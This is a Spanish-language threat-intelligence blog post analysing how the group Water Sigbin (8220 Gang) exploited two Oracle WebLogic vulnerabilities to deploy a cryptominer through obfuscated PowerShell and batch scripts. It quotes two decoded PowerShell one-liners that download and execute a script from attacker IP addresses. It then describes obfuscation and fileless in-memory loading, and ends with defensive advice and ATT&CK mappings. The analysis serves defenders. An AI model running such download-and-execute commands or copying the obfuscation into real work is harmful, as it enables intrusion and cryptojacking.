APT y ataques dirigidos
Water Sigbin (también conocido como 8220 Gang) aprovechó las vulnerabilidades de Oracle WebLogic para implementar un minero de criptomonedas utilizando un script de PowerShell. El actor de amenazas también adoptó nuevas técnicas para ocultar sus actividades, lo que hizo que fuera más difícil defenderse de los ataques.
Tiempo de lectura: ( palabras)
- Water Sigbin aprovechó las vulnerabilidades CVE-2017-3506 y CVE-2023-21839 para implementar un minero de criptomonedas a través de un script de PowerShell.
- La pandilla empleó técnicas de ofuscación, como la codificación hexadecimal de URL y el uso de HTTP a través del puerto 443, lo que permitió la entrega sigilosa de la carga útil.
- El script de PowerShell y el archivo por lotes resultante implicaban una codificación compleja, utilizando variables de entorno para ocultar código malicioso dentro de componentes de script aparentemente benignos.
- El grupo realizó una ejecución sin archivos utilizando técnicas de reflexión .NET en scripts de PowerShell, lo que permite que el código de malware se ejecute únicamente en la memoria, evitando mecanismos de detección basados en disco.
- La evolución continua de las herramientas, tácticas y procedimientos (TTP) de los actores de amenazas resalta la necesidad de que las organizaciones permanezcan alerta y adopten diversas mejores prácticas de ciberseguridad, como la gestión regular de parches, la capacitación de los empleados y los planes de respuesta a incidentes.
Water Sigbin (también conocido como 8220 Gang) es un actor de amenazas con sede en China que ha estado activo desde al menos 2017. Se centra en implementar malware de minería de criptomonedas, principalmente en entornos basados en la nube y servidores Linux. Se sabe que el grupo integra la explotación de vulnerabilidades como parte de su amplia gama de TTP.
En nuestra discusión anterior sobre el tácticas del grupo, analizamos cómo funciona utilizando métodos complejos y en constante evolución. Sin embargo, las ciberamenazas rara vez permanecen estancadas y los actores de amenazas encuentran constantemente nuevas formas de burlar a los defensores. Recientemente, hemos observado que Water Sigbin utiliza nuevas técnicas y métodos para ocultar sus actividades, lo que hace que sea más difícil defender los sistemas contra los ataques del grupo.
Encontramos al actor de amenazas explotando vulnerabilidades con el servidor Oracle WebLogic CVE-2017-3506 (una vulnerabilidad que permite la ejecución remota de comandos del sistema operativo) y CVE-2023-21839 (una vulnerabilidad de deserialización insegura) para implementar un minero de criptomonedas a través de un script de PowerShell llamado bin.ps1 en el host de la víctima. Tras un examen más detenido de las herramientas, tácticas y procedimientos (TTP) del grupo, determinamos que la explotación es obra de Water Sigbin, lo que indica que está actualizando continuamente sus scripts y herramientas de implementación.
Observamos la siguiente carga útil de ataque para CVE-2017-3506:
La cadena codificada en base64 en la carga útil del ataque es la siguiente:
powershell «IEX(New-Object Net.WebClient).DownloadString(‘http://0xb9ac8092:443/bin.ps1’)»
Mientras tanto, la carga útil del ataque CVE-2023-21839 se puede ver en la Figura 2.
Para este exploit, la cadena codificada en base64 en la carga útil del ataque es:
powershell «IEX(New-Object Net.WebClient).DownloadString(‘http://185.172.128.146:443/bin.ps1’)»
Encontramos intentos de explotación tanto en máquinas Linux como en Windows, en las que el actor de amenazas implementó scripts de shell en las primeras y un script de PowerShell en las segundas. Para nuestro análisis, nos referiremos a las técnicas utilizadas en la versión de Windows de la explotación, que muestra una técnica de ofuscación notable utilizada por Water Sigbin.
Al comienzo de la entrega de la carga útil durante la explotación de la vulnerabilidad, el actor de la amenaza utilizó las siguientes técnicas para evadir la detección:
- Implementación de codificación hexadecimal para URL:
La URL utilizada para descargar e implementar el script de PowerShell se muestra en la siguiente imagen:
La notación decimal con puntos de esta URL se traduce como http://187.172.128.146:443/bin[.]ps1
- Empleando HTTP sobre el puerto 443:
Como se ve en la URL anterior, Water Sigbin usa HTTP en el puerto 443 para una comunicación sigilosa.
El bin.ps1 El archivo de script de shell consta de dos partes:
- Una larga cadena codificada en base64 que contiene el código binario e instrucciones para ejecutarlo.
- Una función responsable de decodificar la cadena base64, escribiendo el contenido decodificado en un archivo llamado microsoft_office365.bat en el directorio temporal y ejecutándolo silenciosamente
El contenido codificado en base64 decodificado por el Convertir-Base64ToFileAndExecuteSilently funcionar en el bin.ps1 El archivo revela los elementos principales del script. Este contenido decodificado luego se escribe en el directorio temporal con el nombre de archivo microsoft_office365.bat.
Análisis de microsoft_office365.bat
El microsoft_office365.bat script emplea variables de entorno para ofuscar el código del script original, haciéndolo parecer complejo y confuso. El script comienza con el siguiente código:
Al examinar el script, observamos que parece que se están configurando variables de entorno, que parecen datos ilegibles o sin sentido. Sin embargo, después de un análisis exhaustivo, parece que los actores de amenazas lograron implementar un método muy eficaz para ocultar su código malicioso.
Para obtener el código real, necesitamos decodificar la primera condición «si»:
A continuación, debemos reemplazar RxEGj con vacío (“”) en cada parte del código. Después de hacer esto, la primera parte del script tendrá el siguiente aspecto:
El comando inicial cmd /c «establecer __=&rem” ejecuta un nuevo símbolo del sistema y establece la variable de entorno «__» en una cadena vacía y luego ejecuta el movimiento rápido del ojo (graba comentarios en un archivo por lotes), que no hace nada. En general, la sección de secuencia de comandos parece estar diseñada para iniciar una nueva ventana del símbolo del sistema en modo minimizado y luego salir de la secuencia de comandos actual.
Las siguientes dos largas líneas de contenido codificado en base64 contienen el código binario real, que requiere procesamiento antes de poder utilizarse. El atacante emplea métodos de PowerShell para este procesamiento.
La siguiente sección contiene código de PowerShell ofuscado, que realiza todo el procesamiento en la cadena codificada en base64 para su uso posterior.
De manera similar, si desofuscamos la sección restante reemplazando RxEGj con una cadena vacía («»), obtendremos el código real de PowerShell:
Este comando de PowerShell realiza las siguientes acciones:
- Decodifica la cadena base64 ([Convert]::FromBase64String)
- Realiza el descifrado ([System.Security.Cryptography.Aes]) de la cuerda muy larga
- Descomprime la cadena descifrada. ([IO.Compression.CompressionMode])
- Ejecuta el código de malware usando DotNet en la reflexión de memoria. ([System.Reflection.Assembly])
Al aprovechar «System.Reflection.Assembly», el atacante organiza una estrategia de ejecución sin archivos, asegurando que todas las operaciones ocurran únicamente en la memoria.
Las actividades de Water Sigbin que implican la explotación de CVE-2017-3506 y CVE-2023-21839 subrayan la adaptabilidad de los actores de amenazas modernos. El uso de técnicas sofisticadas de ofuscación, como la codificación hexadecimal de URL, la codificación compleja dentro de PowerShell y scripts por lotes, el uso de variables de entorno y la ofuscación en capas para ocultar código malicioso dentro de scripts aparentemente benignos, demuestra que Water Sigbin es un actor de amenazas capaz de ocultar sus pistas, lo que hace que la detección y la prevención sean más desafiantes para los equipos de seguridad.
Estas tácticas en evolución implican la necesidad de una vigilancia constante y contramedidas proactivas para salvaguardar los sistemas y las redes contra amenazas sofisticadas.
Para proteger eficazmente los sistemas y redes contra la explotación de vulnerabilidades como las llevadas a cabo por Water Sigbin, las organizaciones pueden implementar una variedad de mejores prácticas de ciberseguridad y medidas de defensa proactivas. Aquí hay algunas recomendaciones:
- Gestión de parches. Priorice las actualizaciones periódicas y los procesos de administración de parches para garantizar que todos los sistemas estén ejecutando las últimas versiones de software. Aplique rápidamente parches de seguridad para vulnerabilidades conocidas, especialmente aquellas con vulnerabilidades disponibles públicamente.
- Segmentación de red. Utilice la segmentación de la red para reducir la superficie de ataque. Al separar los segmentos críticos de la red de la red más grande, se puede minimizar el impacto de una posible explotación de vulnerabilidad.
- Auditorías de seguridad periódicas. Realice auditorías de seguridad y evaluaciones de vulnerabilidad con regularidad para identificar y remediar posibles debilidades dentro de la infraestructura antes de que puedan ser explotadas.
- Capacitación en concientización sobre seguridad.. Eduque a los empleados sobre las tácticas comunes utilizadas por los atacantes para que puedan reconocer y evitar ser víctimas de ataques de ingeniería social que podrían preceder a la explotación de vulnerabilidades.
- Plan de respuesta a incidentes. Desarrolle, pruebe y mantenga un plan de respuesta a incidentes para que su organización pueda responder rápida y eficazmente a cualquier violación de seguridad o explotación de vulnerabilidades.
- Inteligencia de amenazas. Suscríbase a fuentes de inteligencia sobre amenazas para mantenerse informado sobre las últimas amenazas y tácticas utilizadas por los actores de amenazas y los grupos de amenazas persistentes avanzadas (APT).
Existen las siguientes protecciones para detectar actividad maliciosa y proteger a los clientes de Trend contra la explotación de las vulnerabilidades analizadas en esta entrada de blog:
- 1011716: Vulnerabilidad de deserialización insegura del servidor Oracle Weblogic (CVE-2023-21839)
- 1010550: Vulnerabilidad de ejecución remota de código del componente de seguridad WLS de Oracle WebLogic (CVE-2017-3506)
Los indicadores de compromiso para esta entrada se pueden encontrar aquí.
ATT&CK DE INGLETE
| Táctica | Técnica | ID de técnica |
|---|---|---|
| Acceso inicial | Explotar aplicaciones públicas | T1190 |
| Ejecución | Intérprete de comandos y secuencias de comandos: PowerShell | T1059.001 |
| Evasión de defensa | Desofuscar/decodificar archivos o información | T1140 |
| Archivos o información ofuscados: ofuscación de comandos | T1027.010 | |
| Ocultar artefactos: ventana oculta | T1564.003 | |
| Inyección de proceso: inyección ejecutable portátil | T1055.002 | |
| Carga de código reflectante | T1620 | |
| Comando y control | Codificación de datos: codificación estándar | T1132.001 |
| Protocolo de capa de aplicación: protocolos web | T1071.001 | |
| Transferencia de herramienta de ingreso | T1105 |
Etiquetas